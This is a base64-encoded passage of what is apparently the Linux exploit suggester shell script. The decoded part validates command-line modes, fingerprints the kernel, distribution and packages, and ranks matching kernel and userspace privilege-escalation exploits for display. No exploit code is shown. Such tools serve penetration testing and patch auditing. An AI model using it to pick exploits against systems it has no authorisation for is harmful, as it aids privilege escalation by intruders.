aW5nID0gInRydWUiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIlN3aXRjaGVzIC11fC0tdW5hbWUgYW5kIC1rfC0ta2VybmVsIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKCiMgZXhpdCBpZiBib3RoIC0tZnVsbCBhbmQgLS1zaG9ydCBhcmUgc2V0ClsgIiRvcHRfZnVsbCIgPSAidHJ1ZSIgXSAmJiBbICRvcHRfc3VtbWFyeSA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtZnwtLWZ1bGwgYW5kIC1nfC0tc2hvcnQgYXJlIG11dHVhbGx5IGV4Y2x1c2l2ZS4gQWJvcnRpbmcuIgoKIyAtLWN2ZWxpc3QtZmlsZSBtb2RlIGlzIHN0YW5kYWxvbmUgbW9kZSBhbmQgaXMgbm90IGFwcGxpY2FibGUgd2hlbiBvbmUgb2YgLWsgfCAtdSB8IC1wIHwgLS1jaGVja3NlYyBzd2l0Y2hlcyBhcmUgc2V0CmlmIFsgIiRvcHRfY3ZlbGlzdF9maWxlIiA9ICJ0cnVlIiBdOyB0aGVuCiAgICBbICEgLWUgIiRDVkVMSVNUX0ZJTEUiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIlByb3ZpZGVkIENWRSBsaXN0IGZpbGUgZG9lcyBub3QgZXhpc3RzLiBBYm9ydGluZy4iCiAgICBbICIkb3B0X2tlcm5lbF92ZXJzaW9uIiA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAta3wtLWtlcm5lbCBhbmQgLS1jdmVsaXN0LWZpbGUgYXJlIG11dHVhbGx5IGV4Y2x1c2l2ZS4gQWJvcnRpbmcuIgogICAgWyAiJG9wdF91bmFtZV9zdHJpbmciID0gInRydWUiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIlN3aXRjaGVzIC11fC0tdW5hbWUgYW5kIC0tY3ZlbGlzdC1maWxlIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKICAgIFsgIiRvcHRfcGtnbGlzdF9maWxlIiA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtcHwtLXBrZ2xpc3QtZmlsZSBhbmQgLS1jdmVsaXN0LWZpbGUgYXJlIG11dHVhbGx5IGV4Y2x1c2l2ZS4gQWJvcnRpbmcuIgpmaQoKIyAtLWNoZWNrc2VjIG1vZGUgaXMgc3RhbmRhbG9uZSBtb2RlIGFuZCBpcyBub3QgYXBwbGljYWJsZSB3aGVuIG9uZSBvZiAtayB8IC11IHwgLXAgfCAtLWN2ZWxpc3QtZmlsZSBzd2l0Y2hlcyBhcmUgc2V0CmlmIFsgIiRvcHRfY2hlY2tzZWNfbW9kZSIgPSAidHJ1ZSIgXTsgdGhlbgogICAgWyAiJG9wdF9rZXJuZWxfdmVyc2lvbiIgPSAidHJ1ZSIgXSAmJiBleGl0V2l0aEVyck1zZyAiU3dpdGNoZXMgLWt8LS1rZXJuZWwgYW5kIC0tY2hlY2tzZWMgYXJlIG11dHVhbGx5IGV4Y2x1c2l2ZS4gQWJvcnRpbmcuIgogICAgWyAiJG9wdF91bmFtZV9zdHJpbmciID0gInRydWUiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIlN3aXRjaGVzIC11fC0tdW5hbWUgYW5kIC0tY2hlY2tzZWMgYXJlIG11dHVhbGx5IGV4Y2x1c2l2ZS4gQWJvcnRpbmcuIgogICAgWyAiJG9wdF9wa2dsaXN0X2ZpbGUiID0gInRydWUiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIlN3aXRjaGVzIC1wfC0tcGtnbGlzdC1maWxlIGFuZCAtLWNoZWNrc2VjIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKZmkKCiMgZXh0cmFjdCBrZXJuZWwgdmVyc2lvbiBhbmQgb3RoZXIgT1MgaW5mbyBsaWtlIGRpc3RybyBuYW1lLCBkaXN0cm8gdmVyc2lvbiwgZXRjLiAzIHBvc3NpYmlsaXRpZXMgaGVyZToKIyBjYXNlIDE6IC0ta2VybmVsIHNldAppZiBbICIkb3B0X2tlcm5lbF92ZXJzaW9uIiA9PSAidHJ1ZSIgXTsgdGhlbgogICAgIyBUT0RPOiBhZGQga2VybmVsIHZlcnNpb24gbnVtYmVyIHZhbGlkYXRpb24KICAgIFsgLXogIiRLRVJORUwiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIlVucmVjb2duaXplZCBrZXJuZWwgdmVyc2lvbiBnaXZlbi4gQWJvcnRpbmcuIgogICAgQVJDSD0iIgogICAgT1M9IiIKCiAgICAjIGRvIG5vdCBwZXJmb3JtIGFkZGl0aW9uYWwgY2hlY2tzIG9uIGN1cnJlbnQgbWFjaGluZQogICAgb3B0X3NraXBfbW9yZV9jaGVja3M9dHJ1ZQoKICAgICMgZG8gbm90IGNvbnNpZGVyIGN1cnJlbnQgT1MKICAgIGdldFBrZ0xpc3QgIiIgIiRQS0dMSVNUX0ZJTEUiCgojIGNhc2UgMjogLS11bmFtZSBzZXQKZWxpZiBbICIkb3B0X3VuYW1lX3N0cmluZyIgPT0gInRydWUiIF07IHRoZW4KICAgIFsgLXogIiRVTkFNRV9BIiBdICYmIGV4aXRXaXRoRXJyTXNnICJ1bmFtZSBzdHJpbmcgZW1wdHkuIEFib3J0aW5nLiIKICAgIHBhcnNlVW5hbWUgIiRVTkFNRV9BIgoKICAgICMgZG8gbm90IHBlcmZvcm0gYWRkaXRpb25hbCBjaGVja3Mgb24gY3VycmVudCBtYWNoaW5lCiAgICBvcHRfc2tpcF9tb3JlX2NoZWNrcz10cnVlCgogICAgIyBkbyBub3QgY29uc2lkZXIgY3VycmVudCBPUwogICAgZ2V0UGtnTGlzdCAiIiAiJFBLR0xJU1RfRklMRSIKCiMgY2FzZSAzOiAtLWN2ZWxpc3QtZmlsZSBtb2RlCmVsaWYgWyAiJG9wdF9jdmVsaXN0X2ZpbGUiID0gInRydWUiIF07IHRoZW4KCiAgICAjIGdldCBrZXJuZWwgY29uZmlndXJhdGlvbiBpbiB0aGlzIG1vZGUKICAgIFsgIiRvcHRfc2tpcF9tb3JlX2NoZWNrcyIgPSAiZmFsc2UiIF0gJiYgZ2V0S2VybmVsQ29uZmlnCgojIGNhc2UgNDogLS1jaGVja3NlYyBtb2RlCmVsaWYgWyAiJG9wdF9jaGVja3NlY19tb2RlIiA9ICJ0cnVlIiBdOyB0aGVuCgogICAgIyB0aGlzIHN3aXRjaCBpcyBub3QgYXBwbGljYWJsZSBpbiB0aGlzIG1vZGUKICAgIG9wdF9za2lwX21vcmVfY2hlY2tzPWZhbHNlCgogICAgIyBnZXQga2VybmVsIGNvbmZpZ3VyYXRpb24gaW4gdGhpcyBtb2RlCiAgICBnZXRLZXJuZWxDb25maWcKICAgIFsgLXogIiRLQ09ORklHIiBdICYmIGVjaG8gIldBUk5JTkcuIEtlcm5lbCBDb25maWcgbm90IGZvdW5kIG9uIHRoZSBzeXN0ZW0gcmVzdWx0cyB3b24ndCBiZSBjb21wbGV0ZS4iCgogICAgIyBsYXVuY2ggY2hlY2tzZWMgbW9kZQogICAgY2hlY2tzZWNNb2RlCgogICAgZXhpdCAwCgojIGNhc2UgNTogbm8gLS11bmFtZSB8IC0ta2VybmVsIHwgLS1jdmVsaXN0LWZpbGUgfCAtLWNoZWNrc2VjIHNldAplbHNlCgogICAgIyAtLXBrZ2xpc3QtZmlsZSBOT1QgcHJvdmlkZWQ6IHRha2UgYWxsIGluZm8gZnJvbSBjdXJyZW50IG1hY2hpbmUKICAgICMgY2FzZSBmb3IgdmFuaWxsYSBleGVjdXRpb246IC4vbGludXgtZXhwbG9pdC1zdWdnZXN0ZXIuc2gKICAgIGlmIFsgIiRvcHRfcGtnbGlzdF9maWxlIiA9PSAiZmFsc2UiIF07IHRoZW4KICAgICAgICBVTkFNRV9BPSQodW5hbWUgLWEpCiAgICAgICAgWyAteiAiJFVOQU1FX0EiIF0gJiYgZXhpdFdpdGhFcnJNc2cgInVuYW1lIHN0cmluZyBlbXB0eS4gQWJvcnRpbmcuIgogICAgICAgIHBhcnNlVW5hbWUgIiRVTkFNRV9BIgoKICAgICAgICAjIGdldCBrZXJuZWwgY29uZmlndXJhdGlvbiBpbiB0aGlzIG1vZGUKICAgICAgICBbICIkb3B0X3NraXBfbW9yZV9jaGVja3MiID0gImZhbHNlIiBdICYmIGdldEtlcm5lbENvbmZpZwoKICAgICAgICAjIGV4dHJhY3QgZGlzdHJpYnV0aW9uIHZlcnNpb24gZnJvbSAvZXRjL29zLXJlbGVhc2UgT1IgL2V0Yy9sc2ItcmVsZWFzZQogICAgICAgIFsgLW4gIiRPUyIgLWEgIiRvcHRfc2tpcF9tb3JlX2NoZWNrcyIgPSAiZmFsc2UiIF0gJiYgRElTVFJPPSQoZ3JlcCAtcyAtRSAnXkRJU1RSSUJfUkVMRUFTRT18XlZFUlNJT05fSUQ9JyAvZXRjLyotcmVsZWFzZSB8IGN1dCAtZCc9JyAtZjIgfCBoZWFkIC0xIHwgdHIgLWQgJyInKQoKICAgICAgICAjIGV4dHJhY3QgcGFja2FnZSBsaXN0aW5nIGZyb20gY3VycmVudCBPUwogICAgICAgIGdldFBrZ0xpc3QgIiRPUyIgIiIKCiAgICAjIC0tcGtnbGlzdC1maWxlIHByb3ZpZGVkOiBvbmx5IGNvbnNpZGVyIHVzZXJzcGFjZSBleHBsb2l0cyBhZ2FpbnN0IHByb3ZpZGVkIHBhY2thZ2UgbGlzdGluZwogICAgZWxzZQogICAgICAgIEtFUk5FTD0iIgogICAgICAgICNUT0RPOiBleHRyYWN0IG1hY2hpbmUgYXJjaCBmcm9tIHBhY2thZ2UgbGlzdGluZwogICAgICAgIEFSQ0g9IiIKICAgICAgICB1bnNldCBFWFBMT0lUUwogICAgICAgIGRlY2xhcmUgLUEgRVhQTE9JVFMKICAgICAgICBnZXRQa2dMaXN0ICIiICIkUEtHTElTVF9GSUxFIgoKICAgICAgICAjIGFkZGl0aW9uYWwgY2hlY2tzIGFyZSBub3QgYXBwbGljYWJsZSBmb3IgdGhpcyBtb2RlCiAgICAgICAgb3B0X3NraXBfbW9yZV9jaGVja3M9dHJ1ZQogICAgZmkKZmkKCmVjaG8KZWNobyAtZSAiJHtibGR3aHR9QXZhaWxhYmxlIGluZm9ybWF0aW9uOiR7dHh0cnN0fSIKZWNobwpbIC1uICIkS0VSTkVMIiBdICYmIGVjaG8gLWUgIktlcm5lbCB2ZXJzaW9uOiAke3R4dGdybn0kS0VSTkVMJHt0eHRyc3R9IiB8fCBlY2hvIC1lICJLZXJuZWwgdmVyc2lvbjogJHt0eHRyZWR9Ti9BJHt0eHRyc3R9IgplY2hvICJBcmNoaXRlY3R1cmU6ICQoWyAtbiAiJEFSQ0giIF0gJiYgZWNobyAtZSAiJHt0eHRncm59JEFSQ0gke3R4dHJzdH0iIHx8IGVjaG8gLWUgIiR7dHh0cmVkfU4vQSR7dHh0cnN0fSIpIgplY2hvICJEaXN0cmlidXRpb246ICQoWyAtbiAiJE9TIiBdICYmIGVjaG8gLWUgIiR7dHh0Z3JufSRPUyR7dHh0cnN0fSIgfHwgZWNobyAtZSAiJHt0eHRyZWR9Ti9BJHt0eHRyc3R9IikiCmVjaG8gLWUgIkRpc3RyaWJ1dGlvbiB2ZXJzaW9uOiAkKFsgLW4gIiRESVNUUk8iIF0gJiYgZWNobyAtZSAiJHt0eHRncm59JERJU1RSTyR7dHh0cnN0fSIgfHwgZWNobyAtZSAiJHt0eHRyZWR9Ti9BJHt0eHRyc3R9IikiCgplY2hvICJBZGRpdGlvbmFsIGNoZWNrcyAoQ09ORklHXyosIHN5c2N0bCBlbnRyaWVzLCBjdXN0b20gQmFzaCBjb21tYW5kcyk6ICQoWyAiJG9wdF9za2lwX21vcmVfY2hlY2tzIiA9PSAiZmFsc2UiIF0gJiYgZWNobyAtZSAiJHt0eHRncm59cGVyZm9ybWVkJHt0eHRyc3R9IiB8fCBlY2hvIC1lICIke3R4dHJlZH1OL0Eke3R4dHJzdH0iKSIKCmlmIFsgLW4gIiRQS0dMSVNUX0ZJTEUiIC1hIC1uICIkUEtHX0xJU1QiIF07IHRoZW4KICAgIHBrZ0xpc3RGaWxlPSIke3R4dGdybn0kUEtHTElTVF9GSUxFJHt0eHRyc3R9IgplbGlmIFsgLW4gIiRQS0dMSVNUX0ZJTEUiIF07IHRoZW4KICAgIHBrZ0xpc3RGaWxlPSIke3R4dHJlZH11bnJlY29nbml6ZWQgZmlsZSBwcm92aWRlZCR7dHh0cnN0fSIKZWxpZiBbIC1uICIkUEtHX0xJU1QiIF07IHRoZW4KICAgIHBrZ0xpc3RGaWxlPSIke3R4dGdybn1mcm9tIGN1cnJlbnQgT1Mke3R4dHJzdH0iCmZpCgplY2hvIC1lICJQYWNrYWdlIGxpc3Rpbmc6ICQoWyAtbiAiJHBrZ0xpc3RGaWxlIiBdICYmIGVjaG8gLWUgIiRwa2dMaXN0RmlsZSIgfHwgZWNobyAtZSAiJHt0eHRyZWR9Ti9BJHt0eHRyc3R9IikiCgojIGhhbmRsZSAtLWtlcm5lbHNwYWN5LW9ubHkgJiAtLXVzZXJzcGFjZS1vbmx5IGZpbHRlciBvcHRpb25zCmlmIFsgIiRvcHRfa2VybmVsX29ubHkiID0gInRydWUiIC1vIC16ICIkUEtHX0xJU1QiIF07IHRoZW4KICAgIHVuc2V0IEVYUExPSVRTX1VTRVJTUEFDRQogICAgZGVjbGFyZSAtQSBFWFBMT0lUU19VU0VSU1BBQ0UKZmkKCmlmIFsgIiRvcHRfdXNlcnNwYWNlX29ubHkiID0gInRydWUiIF07IHRoZW4KICAgIHVuc2V0IEVYUExPSVRTCiAgICBkZWNsYXJlIC1BIEVYUExPSVRTCmZpCgplY2hvCmVjaG8gLWUgIiR7Ymxkd2h0fVNlYXJjaGluZyBhbW9uZzoke3R4dHJzdH0iCmVjaG8KZWNobyAiJHsjRVhQTE9JVFNbQF19IGtlcm5lbCBzcGFjZSBleHBsb2l0cyIKZWNobyAiJHsjRVhQTE9JVFNfVVNFUlNQQUNFW0BdfSB1c2VyIHNwYWNlIGV4cGxvaXRzIgplY2hvCgplY2hvIC1lICIke2JsZHdodH1Qb3NzaWJsZSBFeHBsb2l0czoke3R4dHJzdH0iCmVjaG8KCiMgc3RhcnQgYW5hbHlzaXMKaj0wCmZvciBFWFAgaW4gIiR7RVhQTE9JVFNbQF19IiAiJHtFWFBMT0lUU19VU0VSU1BBQ0VbQF19IjsgZG8KCiAgICAjIGNyZWF0ZSBhcnJheSBmcm9tIGN1cnJlbnQgZXhwbG9pdCBoZXJlIGRvYyBhbmQgZmV0Y2ggbmVlZGVkIGxpbmVzCiAgICBpPTAKICAgICMgKCctcicgaXMgdXNlZCB0byBub3QgaW50ZXJwcmV0IGJhY2tzbGFzaCB1c2VkIGZvciBiYXNoIGNvbG9ycykKICAgIHdoaWxlIHJlYWQgLXIgbGluZQogICAgZG8KICAgICAgICBhcnJbaV09IiRsaW5lIgogICAgICAgIGk9JCgoaSArIDEpKQogICAgZG9uZSA8PDwgIiRFWFAiCgogICAgTkFNRT0iJHthcnJbMF19IiAmJiBOQU1FPSIke05BTUU6Nn0iCiAgICBSRVFTPSIke2FyclsxXX0iICYmIFJFUVM9IiR7UkVRUzo2fSIKICAgIFRBR1M9IiR7YXJyWzJdfSIgJiYgVEFHUz0iJHtUQUdTOjZ9IgogICAgUkFOSz0iJHthcnJbM119IiAmJiBSQU5LPSIke1JBTks6Nn0iCgogICAgIyBzcGxpdCBsaW5lIHdpdGggcmVxdWlyZW1lbnRzICYgbG9vcCB0aHJ1IGFsbCByZXFzIG9uZSBieSBvbmUgJiBjaGVjayB3aGV0aGVyIGl0IGlzIG1ldAogICAgSUZTPScsJyByZWFkIC1yIC1hIGFycmF5IDw8PCAiJFJFUVMiCiAgICBSRVFTX05VTT0keyNhcnJheVtAXX0KICAgIFBBU1NFRF9SRVE9MAogICAgZm9yIFJFUSBpbiAiJHthcnJheVtAXX0iOyBkbwogICAgICAgIGlmIChjaGVja1JlcXVpcmVtZW50ICIkUkVRIiAiJHthcnJheVswXX0iKTsgdGhlbgogICAgICAgICAgICBQQVNTRURfUkVRPSQoKCRQQVNTRURfUkVRICsgMSkpCiAgICAgICAgZWxzZQogICAgICAgICAgICBicmVhawogICAgICAgIGZpCiAgICBkb25lCgogICAgIyBleGVjdXRlIGZvciBleHBsb2l0cyB3aXRoIGFsbCByZXF1aXJlbWVudHMgbWV0CiAgICBpZiBbICRQQVNTRURfUkVRIC1lcSAkUkVRU19OVU0gXTsgdGhlbgoKICAgICAgICAjIGFkZGl0aW9uYWwgcmVxdWlyZW1lbnQgZm9yIC0tY3ZlbGlzdC1maWxlIG1vZGU6IGNoZWNrIGlmIENWRSBhc3NvY2lhdGVkIHdpdGggdGhlIGV4cGxvaXQgaXMgb24gdGhlIENWRUxJU1RfRklMRQogICAgICAgIGlmIFsgIiRvcHRfY3ZlbGlzdF9maWxlIiA9ICJ0cnVlIiBdOyB0aGVuCgogICAgICAgICAgICAjIGV4dHJhY3QgQ1ZFKHMpIGFzc29jaWF0ZWQgd2l0aCBnaXZlbiBleHBsb2l0IChhbHNvIHRyYW5zbGF0ZXMgJywnIHRvICd8JyBmb3IgZWFzeSBoYW5kbGluZyBtdWx0aXBsZSBDVkVzIGNhc2UgLSB2aWEgZXh0ZW5kZWQgcmVnZXgpCiAgICAgICAgICAgIGN2ZT0kKGVjaG8gIiROQU1FIiB8IGdyZXAgJy4qXFsuKlxdLionIHwgY3V0IC1kICdtJyAtZjIgfCBjdXQgLWQgJ10nIC1mMSB8IHRyIC1kICdbJyB8IHRyICIsIiAifCIpCiAgICAgICAgICAgICNlY2hvICJDVkU6ICRjdmUiCgogICAgICAgICAgICAjIGNoZWNrIGlmIGl0J3Mgb24gQ1ZFTElTVF9GSUxFIGxpc3QsIGlmIG5vIG1vdmUgdG8gbmV4dCBleHBsb2l0CiAgICAgICAgICAgIFsgISAkKGNhdCAiJENWRUxJU1RfRklMRSIgfCBncmVwIC1FICIkY3ZlIikgXSAmJiBjb250aW51ZQogICAgICAgIGZpCgogICAgICAgICMgcHJvY2VzcyB0YWdzIGFuZCBoaWdobGlnaHQgdGhvc2UgdGhhdCBtYXRjaCBjdXJyZW50IE9TIChvbmx5IGZvciBkZWJ8dWJ1bnR1fFJIRUwgYW5kIGlmIHdlIGtub3cgZGlzdHJvIHZlcnNpb24gLSBkaXJlY3QgbW9kZSkKICAgICAgICB0YWdzPSIiCiAgICAgICAgaWYgWyAtbiAiJFRBR1MiIC1hIC1uICIkT1MiIF07IHRoZW4KICAgICAgICAgICAgSUZTPScsJyByZWFkIC1yIC1hIHRhZ3NfYXJyYXkgPDw8ICIkVEFHUyIKICAgICAgICAgICAgVEFHU19OVU09JHsjdGFnc19hcnJheVtAXX0KCiAgICAgICAgICAgICMgYnVtcCBSQU5LIHNsaWdodGx5ICgrMSkgaWYgd2UncmUgaW4gJy0tdW5hbWUnIG1vZGUgYW5kIHRoZXJlJ3MgYSBUQUcgZm9yIE9TIGZyb20gdW5hbWUgc3RyaW5nCiAgICAgICAgICAgIFsgIiQoZWNobyAiJHt0YWdzX2FycmF5W0BdfSIgfCBncmVwICIkT1MiKSIgLWEgIiRvcHRfdW5hbWVfc3RyaW5nIiA9PSAidHJ1ZSIgXSAmJiBSQU5LPSQoKCRSQU5LICsgMSkpCgogICAgICAgICAgICBmb3IgVEFHIGluICIke3RhZ3NfYXJyYXlbQF19IjsgZG8KICAgICAgICAgICAgICAgIHRhZ19kaXN0cm89JChlY2hvICIkVEFHIiB8IGN1dCAtZCc9JyAtZjEpCiAgICAgICAgICAgICAgICB0YWdfZGlzdHJvX251bV9hbGw9JChlY2hvICIkVEFHIiB8IGN1dCAtZCc9JyAtZjIpCiAgICAgICAgICAgICAgICAjIGluIGNhc2Ugb2YgdGFnIG9mIGZvcm06ICd1YnVudHU9MTYuMDR7a2VybmVsOjQuNC4wLTIxfSByZW1vdmUga2VybmVsIHZlcnNpb25pbmcgcGFydCBmb3IgY29tcGFyaXNpb24KICAgICAgICAgICAgICAgIHRhZ19kaXN0cm9fbnVtPSIke3RhZ19kaXN0cm9fbnVtX2FsbCV7Kn0iCgogICAgICAgICAgICAgICAgIyB3ZSdyZSBpbiAnLS11bmFtZScgbW9kZSBPUiAoZm9yIG5vcm1hbCBtb2RlKSBpZiB0aGVyZSBpcyBkaXN0cm8gdmVyc2lvbiBtYXRjaAogICAgICAgICAgICAgICAgaWYgWyAiJG9wdF91bmFtZV9zdHJpbmciID09ICJ0cnVlIiAtbyBcKCAiJE9TIiA9PSAiJHRhZ19kaXN0cm8iIC1hICIkKGVjaG8gIiRESVNUUk8iIHwgZ3JlcCAtRSAiJHRhZ19kaXN0cm9fbnVtIikiIFwpIF07IHRoZW4KCiAgICAgICAgICAgICAgICAgICAgIyBidW1wIGN1cnJlbnQgZXhwbG9pdCdzIHJhbmsgYnkgMiBmb3IgZGlzdHJvIG1hdGNoIChhbmQgbm90IGluICctLXVuYW1lJyBtb2RlKQogICAgICAgICAgICAgICAgICAgIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9PSAiZmFsc2UiIF0gJiYgUkFOSz0kKCgkUkFOSyArIDIpKQoKICAgICAgICAgICAgICAgICAgICAjIGdldCBuYW1lIChrZXJuZWwgb3IgcGFja2FnZSBuYW1lKSBhbmQgdmVyc2lvbiBvZiBrZXJuZWwvcGtnIGlmIHByb3ZpZGVkOgogICAgICAgICAgICAgICAgICAgIHRhZ19wa2c9JChlY2hvICIkdGFnX2Rpc3Ryb19udW1fYWxsIiB8IGN1dCAtZCd7JyAtZiAyIHwgdHIgLWQgJ30nIHwgY3V0IC1kJzonIC1mIDEpCiAgICAgICAgICAgICAgICAgICAgdGFnX3BrZ19udW09IiIKICAgICAgICAgICAgICAgICAgICBbICQoZWNobyAiJHRhZ19kaXN0cm9fbnVtX2FsbCIgfCBncmVwICd7JykgXSAmJiB0YWdfcGtnX251bT0kKGVjaG8gIiR0YWdfZGlzdHJvX251bV9hbGwiIHwgY3V0IC1kJ3snIC1mIDIgfCB0ciAtZCAnfScgfCBjdXQgLWQnOicgLWYgMikKCiAgICAgICAgICAgICAgICAgICAgI1sgLW4gIiR0YWdfcGtnX251bSIgXSAmJiBlY2hvICJ0YWdfcGtnX251bTogJHRhZ19wa2dfbnVtOyBrZXJuZWw6ICRLRVJORUxfQUxMIgoKICAgICAgICAgICAgICAgICAgICAjIGlmIHBrZy9rZXJuZWwgdmVyc2lvbiBpcyBub3QgcHJvdmlkZWQ6CiAgICAgICAgICAgICAgICAgICAgaWYgWyAteiAiJHRhZ19wa2dfbnVtIiBdOyB0aGVuCiAgICAgICAgICAgICAgICAgICAgICAgIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9PSAiZmFsc2UiIF0gJiYgVEFHPSIke2xpZ2h0eWVsbG93fVsgJHtUQUd9IF0ke3R4dHJzdH0iCgogICAgICAgICAgICAgICAgICAgICMga2VybmVsIHZlcnNpb24gcHJvdmlkZWQsIGNoZWNrIGZvciBtYXRjaDoKICAgICAgICAgICAgICAgICAgICBlbGlmIFsgLW4gIiR0YWdfcGtnX251bSIgLWEgIiR0YWdfcGtnIiA9ICJrZXJuZWwiIF07IHRoZW4KICAgICAgICAgICAgICAgICAgICAgICAgaWYgWyAkKGVjaG8gIiRLRVJORUxfQUxMIiB8IGdyZXAgLUUgIiR7dGFnX3BrZ19udW19IikgXTsgdGhlbgogICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBrZXJuZWwgdmVyc2lvbiBtYXRjaGVkIC0gYm9sZCBoaWdobGlnaHQKICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRBRz0iJHt5ZWxsb3d9WyAke1RBR30gXSR7dHh0cnN0fSIKCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAjIGJ1bXAgY3VycmVudCBleHBsb2l0J3MgcmFuayBhZGRpdGlvbmFsbHkgYnkgMyBmb3Iga2VybmVsIHZlcnNpb24gcmVnZXggbWF0Y2gKICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJBTks9JCgoJFJBTksgKyAzKSkKICAgICAgICAgICAgICAgICAgICAgICAgZWxzZQogICAgICAgICAgICAgICAgICAgICAgICAgICAgWyAiJG9wdF91bmFtZV9zdHJpbmciID09ICJmYWxzZSIgXSAmJiBUQUc9IiR7bGlnaHR5ZWxsb3d9WyAkdGFnX2Rpc3Rybz0kdGFnX2Rpc3Ryb19udW0gXSR7dHh0cnN0fXtrZXJuZWw6JHRhZ19wa2dfbnVtfSIKICAgICAgICAgICAgICAgICAgICAgICAgZmkKCiAgICAgICAgICAgICAgICAgICAgIyBwa2cgdmVyc2lvbiBwcm92aWRlZCwgY2hlY2sgZm9yIG1hdGNoIChUQkQpOgogICAgICAgICAgICAgICAgICAgIGVsaWYgWyAtbiAiJHRhZ19wa2dfbnVtIiAtYSAtbiAiJHRhZ19wa2ciICBdOyB0aGVuCiAgICAgICAgICAgICAgICAgICAgICAgIFRBRz0iJHtsaWdodHllbGxvd31bICR0YWdfZGlzdHJvPSR0YWdfZGlzdHJvX251bSBdJHt0eHRyc3R9eyR0YWdfcGtnOiR0YWdfcGtnX251bX0iCiAgICAgICAgICAgICAgICAgICAgZmkKCiAgICAgICAgICAgICAgICBmaQoKICAgICAgICAgICAgICAgICMgYXBwZW5kIGN1cnJlbnQgdGFnIHRvIHRhZ3MgbGlzdAogICAgICAgICAgICAgICAgdGFncz0iJHt0YWdzfSR7VEFHfSwiCiAgICAgICAgICAgIGRvbmUKICAgICAgICAgICAgIyB0cmltICcsJyBhZGRlZCBieSBhYm92ZSBsb29wCiAgICAgICAgICAgIFsgLW4gIiR0YWdzIiBdICYmIHRhZ3M9IiR7dGFncyU/fSIKICAgICAgICBlbHNlCiAgICAgICAgICAgIHRhZ3M9IiRUQUdTIgogICAgICAgIGZpCgogICAgICAgICMgaW5zZXJ0IHRoZSBtYXRjaGVkIGV4cGxvaXQgKHdpdGggY2FsY3VsYXRlZCBSYW5rIGFuZCBoaWdobGlnaHRlZCB0YWdzKSB0byBhcnJhcnkgdGhhdCB3aWxsIGJlIHNvcnRlZAogICAgICAgIEVYUD0kKGVjaG8gIiRFWFAiIHwgc2VkIC1lICcvXk5hbWU6L2QnIC1lICcvXlJlcXM6L2QnIC1lICcvXlRhZ3M6L2QnKQogICAgICAgIGV4cGxvaXRzX3RvX3NvcnRbal09IiR7UkFOS31OYW1lOiAke05BTUV9RDNMMW1SZXFzOiAke1JFUVN9RDNMMW1UYWdzOiAke3RhZ3N9RDNMMW0kKGVjaG8gIiRFWFAiIHwgc2VkIC1lICc6YScgLWUgJ04nIC1lICckIWJhJyAtZSAncy9cbi9EM0wxbS9nJykiCiAgICAgICAgKChqKyspKQogICAgZmkKZG9uZQoKIyBzb3J0IGV4cGxvaXRzIGJhc2VkIG9uIGNhbGN1bGF0ZWQgUmFuawpJRlM9JCdcbicKU09SVEVEX0VYUExPSVRTPSgkKHNvcnQgLXIgPDw8IiR7ZXhwbG9pdHNfdG9fc29ydFsqXX0iKSkKdW5zZXQgSUZTCgojIGRpc3BsYXkgc29ydGVkIGV4cGxvaXRzCmZvciBFWFBfVEVNUCBpbiAiJHtTT1JURURfRVhQTE9JVFNbQF19IjsgZG8KCglSQU5LPSQoZWNobyAiJEVYUF9URU1QIiB8IGF3ayAtRidOYW1lOicgJ3twcmludCAkMX0nKQoKCSMgY29udmVydCBlbnRyeSBiYWNrIHRvIGNhbm9uaWNhbCBmb3JtCglFWFA9JChlY2hvICIkRVhQX1RFTVAiIHwgc2VkICdzL15bMC05XS8vZycgfCBzZWQgJ3MvRDNMMW0vXG4vZycpCgoJIyBjcmVhdGUgYXJyYXkgZnJvbSBjdXJyZW50IGV4cGxvaXQgaGVyZSBkb2MgYW5kIGZldGNoIG5lZWRlZCBsaW5lcwogICAgaT0wCiAgICAjICgnLXInIGlzIHVzZWQgdG8gbm90IGludGVycHJldCBiYWNrc2xhc2ggdXNlZCBmb3IgYmFzaCBjb2xvcnMpCiAgICB3aGlsZSByZWFkIC1yIGxpbmUKICAgIGRvCiAgICAgICAgYXJyW2ldPSIkbGluZSIKICAgICAgICBpPSQoKGkgKyAxKSkKICAgIGRvbmUgPDw8ICIkRVhQIgoKICAgIE5BTUU9IiR7YXJyWzBdfSIgJiYgTkFNRT0iJHtOQU1FOjZ9IgogICAgUkVRUz0iJHthcnJbMV19IiAmJiBSRVFTPSIke1JFUVM6Nn0iCiAgICBUQUdTPSIke2FyclsyXX0iICYmIHRhZ3M9IiR7VEFHUzo2fSIKCglFWFBMT0lUX0RCPSQoZWNobyAiJEVYUCIgfCBncmVwICJleHBsb2l0LWRiOiAiIHwgYXdrICd7cHJpbnQgJDJ9JykKCWFuYWx5c2lzX3VybD0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAiYW5hbHlzaXMtdXJsOiAiIHwgYXdrICd7cHJpbnQgJDJ9JykKCWV4dF91cmw9JChlY2hvICIkRVhQIiB8IGdyZXAgImV4dC11cmw6ICIgfCBhd2sgJ3twcmludCAkMn0nKQoJY29tbWVudHM9JChlY2hvICIkRVhQIiB8IGdyZXAgIkNvbW1lbnRzOiAiIHwgY3V0IC1kJyAnIC1mIDItKQoJcmVxcz0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAiUmVxczogIiB8IGN1dCAtZCcgJyAtZiAyKQoKCSMgZXhwbG9pdCBuYW1lIHdpdGhvdXQgQ1ZFIG51bWJlciBhbmQgd2l0aG91dCBjb